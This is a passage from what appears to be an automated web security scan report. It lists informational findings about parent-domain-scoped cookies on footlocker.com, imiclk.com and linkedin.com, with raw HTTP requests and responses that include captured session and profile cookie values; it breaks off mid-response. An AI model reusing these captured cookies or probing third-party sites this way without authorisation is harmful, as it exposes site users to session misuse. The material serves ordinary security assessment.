Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 01:58:56 GMT;path=/
Content-Length: 107727


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Sneakers - Athletic Sho
...[SNIP]...

12.83. http://www.footlocker.com/login/login.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:26 GMT
Connection: close
Set-Cookie: SSLC=web%2D06;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:26 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:26 GMT;path=/
Content-Length: 196


   <iframe src="http://www.footlocker.com/login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true&dontRunBV=true" width="250" height="185" frameborder="0" scrolling="no"></iframe>

12.84. http://www.footlocker.com/login/login_forgotpassword.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_forgotpassword.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: SSLC, set with domain=.footlocker.com by www.footlocker.com in the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login_forgotpassword.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 2789


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...

12.85. http://www.footlocker.com/login/login_form.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: SSLC, set with domain=.footlocker.com by www.footlocker.com in the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:33 GMT
Connection: close
Set-Cookie: SSLC=web%2D15;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:33 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:33 GMT;path=/
Content-Length: 3227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...

12.86. https://www.footlocker.com/account/default.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /account/default.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: SSLC, set with domain=.footlocker.com by www.footlocker.com in the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/default.cfm?action=accountCreate HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0; NewRegistrant=Global Header Log In|Create an Account

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker New Account
...[SNIP]...

12.87. https://www.footlocker.com/account/default/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /account/default/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: SSLC, set with domain=.footlocker.com by www.footlocker.com in the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/default/ HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:41 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D14;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:41 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:41 GMT;path=/
Content-Length: 78368


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker Account Sig
...[SNIP]...

12.88. http://www.imiclk.com/cgi/r.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: CH and RQ, set with domain=.imiclk.com by www.imiclk.com in the response below. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC; YU=3619a40dde8a3ac4dfc0a3674599e768-53bro; CH=24785,53c1h,22244,53br0,28363,53br0,18661,53bro,18654,53bro,24783,53c1h,33114,00000,18653,53bro,24782,53c1h,32619,00000,32620,00000; RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:54:27 GMT
Connection: close
Set-Cookie: CH=18654,53bro,18661,53bro,28363,53br0,22244,53br0,24785,53c27,24783,53c27,18653,53bro,33114,00000,24782,53c27,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:05:18 GMT
Set-Cookie: RQ=985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:05:18 GMT
Content-Length: 224

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://pixel.mathtag.com/data/img?mt_id=100040&amp;mt_dcid=1305510867" alt="" border="0" width="1" h
...[SNIP]...

12.89. http://www.linkedin.com/companyInsider

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /companyInsider

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: lang, set with Domain=linkedin.com by www.linkedin.com in the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /companyInsider?script&useBorder=no HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; bcookie="v=1&977d2a8e-45ea-4463-ac17-4a70c2eb7f42"; __qca=P0-831343408-1305412455203

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
